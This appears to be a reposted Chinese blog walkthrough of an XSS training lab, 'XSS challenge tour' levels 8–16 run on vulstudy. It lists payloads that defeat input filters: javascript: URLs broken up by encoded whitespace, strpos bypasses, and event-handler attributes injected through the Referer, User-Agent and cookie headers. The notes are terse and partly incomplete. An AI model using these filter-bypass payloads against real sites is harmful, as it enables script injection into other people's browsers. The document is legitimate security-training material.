-使用vulstudy一键搭建靶机
8 检测href src on data字符并添加下划线,同时对输入的双引号进行html编码
Payload: 使用unicode编码,unicode编码就是在ascii编码前加
orgCode=''
print ';'.join('{}'.format(ord(x)) for x in orgCode)
javascript:alert(1)
参考:https://programmer.help/blogs/xss-challenge-tour-by-reading-the-code.html
javas%09cript:alert()
javas%0acript:alert()
javas%0dcript:alert()
9 Payload: javascript:alert(1)//http://
考察绕过strpos
10
Payload: " autofocus="" οnfοcus="javascript:alert(1)" type="
利用type=""覆盖掉input的隐藏type,从而执行onfocus
11 Payload: 在refer处添加 " autofocus="" οnfοcus="javascript:alert(1)" type="
12 Payload: 在user-agent处添加 " autofocus="" οnfοcus="javascript:alert(1)" type="
13 Payload: 在cookie中user处添加 " autofocus="" οnfοcus="javascript:alert(1)" type="
14 页面生成cookie有问题
15 Payload: http://10.150.10.186:8091/level15.php?src='level6.php'
ng-include 为AngularJS 指令 ,主要用来包含其他文件,我们可以包含之前的文件来插入xss。注意这儿使用时浏览器会访问googleapis.com失败导致刷不出来
16 考察绕过空格
Payload:
标签:XSS,http,8091,challenge,192.168,alert,tour,php,Payload
来源: https://www.cnblogs.com/zongdeiqianxing/p/13450722.html